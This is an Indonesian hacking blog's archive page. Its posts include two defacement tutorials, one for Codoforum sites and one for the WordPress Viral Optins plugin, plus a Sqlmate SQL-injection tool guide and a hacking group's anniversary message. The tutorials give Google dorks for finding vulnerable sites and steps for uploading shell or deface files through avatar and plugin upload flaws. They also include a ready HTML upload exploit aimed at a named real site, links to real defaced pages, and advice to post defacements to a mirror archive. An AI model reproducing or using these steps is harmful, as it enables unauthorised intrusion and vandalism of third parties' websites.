Home » Archives for April 2018

Powered By Codoforum Upload Shell

Deface Menggunakan Metode Powered By Codoforum Upload Shell

Bahan :

Dork : inurl:/user/register intext:"powered by codoforum"
File yang akan di upload ( .txt , .jpg.PhP , or other extension bypass )

Tutorial :

1. Dorking inurl:/user/register intext:"powered by codoforum" di google pencarian

2. Pilih salah satu web target

3. Silahkan lakukan registrasi terlebih dahulu ( isi asal asal aja )

4. Jika sudah selesai memasukkan datanya silahkan tekan "Register"

5. Jika vuln maka kalian akan dialihkan ke profil akun yang kalian daftarkan

6. Pada sudut kanan atas, ada bagian menu profil kalian, tekan "Edit"

7. Pada bagian Avatar tekan "Change" lalu pilih file yang akan kalian upload. Selesai memilih filenya lalu tekan "Save Changes"

8. Jika sudah terganti, klik kanan pada Avatar kalian lalu pilih "Open image in new tab"

9. Dan disitu file yang kalian upload akan muncul.

seperti ini : http://www.pantunminang.com/sites/default/assets/img/profiles/5ae0f01f12b7e.txt

Mudah bukan? Tinggal kalian merror'in deh hasil deface kalian ke web mirror yang kalian suka. dan ini hasil mirror saya pada defacer id https://defacer.id/archive/mirror/1046721

Sekianlah Postingan Dari All Tutor Cyber tentang "Powered By Codoforum Upload Shell" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Powered By Codoforum Upload Shell" Dengan URL https://ryangueltoem.blogspot.com/2018/04/powered-by-codoforum-upload-shell.html

Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.

Add Comment

FB Comments

Cara Install dan Menggunakan Sqlmate di Termux

Sqlmate in Termux

Apa itu Sqlmate?
Sqlmate adalah tools pentest yg di buat oleh team ultimatehackers asal india yang di bangun dengan bahasa pemerograman python dan fungsi tools ini sebenarnya untuk menunjang kegiatan sql injection menggunakan sqlmap, Atau bisa di katakan bahwa sqlmate ini adalah tools pendamping sqlmap.

Fitur yang terdapat didalam Sqlmate :

Sql dorking vulnerbillity
Check vulnerbillity bypass admin
Admin finder
Mencari Dork
Detection Sql Quary

Yang pasti kalian semua telah memiliki aplikasi Termux di android kalian masing masing. Aplikasi Termux bisa kalian download di dalam Playstore.

Cara Install Sqlmate di Termux :

$ apt update && apt upgrade

$ apt install git python python2

$ git clone https://github.com/UltimateHackers/sqlmate.git

$ cd sqlmate

$ pip2 install -r requirements.txt

$ pip2 install urlparse2

Cara menjalankannya kalian tinggal ketik kode

$ python2 sqlmate

Jika sudah keluar gambar Sqlmate seperti gambar diatas, berarti kalian telah berhasil menjalankan Sqlmate-nya.

kalian tinggal memasukkan dork buat mencari website yang vuln sql.

Perintah lain dalam Sqlmate :

1. Hash password md5

$python2 sqlmate --hash "kode_md5" (tanpa tanda kutip)

contoh : $python2 sqlmate --hash 259416b330cdf9e1cceed6281ab88fcb

2. Mencari admin login website

$python2 sqlmate --admin "link_website" --type "bahasa pemogramman website" (tanpa tanda kutip)

contoh : $python2 sqlmate --admin alltutorcyber.net --type PHP

3. Mencari Dork

$python2 sqlmate --dump 4

Untuk melihat dorknya kalian tinggal memasukkan kode $cat "nama_file_tempat_menyimpan_dork.txt" (tanpa tanda kutip)
contoh : $cat dorks13:41.txt

Sekianlah Postingan Dari All Tutor Cyber tentang "Cara Install dan Menggunakan Sqlmate di Termux" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Cara Install dan Menggunakan Sqlmate di Termux" Dengan URL https://ryangueltoem.blogspot.com/2018/04/cara-install-dan-menggunakan-sqlmate-di.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.

Add Comment

FB Comments

WordPress Viral Optins Plugin Exploit and File Upload

WordPress Viral Optins Plugin Exploit and File Upload

Bahan :

1. Dork : inurl:/wp-content/plugins/viral-optins/

2. File yang akan di upload ( format txt, jpg, or bypass extension )

3. Exploit

<form method="POST" action="[link_website]/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>

Tutorial :
1. Dorking inurl:/wp-content/plugins/viral-optins/ di google pencarian

2. Pilih salah satu web

3. Masukkin link website kedalam exploit

contoh :

<form method="POST" action="http://migmar.com/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>

Lalu save dalam format .html
contoh : test.html

4. Buka exploit html tadi lalu upload file yang akan di upload ke dalam website, lalu tekan upload.

5. Klik kanan pada gambar lalu tekan "Open image in new tab"

6. Suksess.. File kalian telah terupload ke dalam website
contoh hasilnya : http://migmar.com/wp/wp-content/uploads/2018/04/shell-2.txt

Kalian tinggal mirror'in hasil kalian ke dalam web mirror.
Untuk mempercantik file txt kalian, kalian dapat menggunakan ASCII Art di http://patorjk.com/software/taag/

Sekianlah Postingan Dari All Tutor Cyber tentang "WordPress Viral Optins Plugin Exploit and File Upload" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "WordPress Viral Optins Plugin Exploit and File Upload" Dengan URL https://ryangueltoem.blogspot.com/2018/04/wordpress-viral-optins-plugin-exploit.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.

Add Comment

FB Comments

Anniversary GSH Ke 5 Tahun

Segala Puji Bagi Tuhan yang Maha Esa salam sejahtera untuk kita semua Kali ini kami sudah tak terasa sudah 5 Tahun Garuda Security Hacker Berdiri banyak hal yang kami lalui mulai dari masa-masa senang, susah, masa-masa jaya dan masa-masa disaat kami mulai terancam dengan banyak nya hal yang kami alami hal itu lah yang membuat GSH penuh warna.

Yang menguatkan GSH hingga saat ini adalah solidaritas dan kekompakan antar anggota selama di komunitas ini kami melakukan kegiatan apapun baik Belajar bersama, Pentest bersama, dan Have fun bersama termasuk berbagi Bahan Coli wkwkwkwk yang hingga saat ini di Fanpage isinya bacol semua bagi yang mau bacol hasil dari kurator bacol GSH cek di fanpage GSH di album "Bacol of The Day".

Selama 5 Tahun terakhir ini kami melalui banyak hal

Masa-Masa Senang dan Jaya

Didalam Komunitas ini banyak yang memiliki keahlian di berbagai bidang IT sehingga sharing dan diskusi terus berjalan di Grup Chat
Anggota saling membantu satu sama lainnya.
Munculnya portal garudasecurityhacker.org, project.garudasecurityhacker.org , blog.garudasecurityhacker.org, dan big.garudasecurityhacker.org didasari atas jiwa kreativitas dan kemauan GSH untuk berbagi informasi.
GSH mulai dipandang dan dikenal baik oleh masyarakat.

Masa-masa sulit yang pernah kami alami

Haters yang begitu banyak (rata-rata anak-anak dari komunitas hacker underground yang pro dan yang ilmu nya diatas rata-rata gitu katanya)
Anggota yang terlibat aktivitas Illegal
Founder GSH yang menghilang tanpa kabar banyak anggota senior bilang sang Founder GSH saat ini berada di Australia dan sudah sukses disana hingga saat ini belum tau kebenaran informasi tersebut.
Banyak anak kemaren sore yang pengen gabung ke GSH hanya untuk menjadi cepat tenar, cepat kaya dan ingin segera menjadi sang ahli.
Member yang berjiwa kutu loncat adalah salah satu kendala GSH

Di Ulang tahun GSH yang ke lima ini kami berharap GSH bisa semakin hari semakin solid dan kompak dan semakin positif kegiatan nya tidak adalah aktivitas Cyber Vandalism dan Illegal Activity lainnya.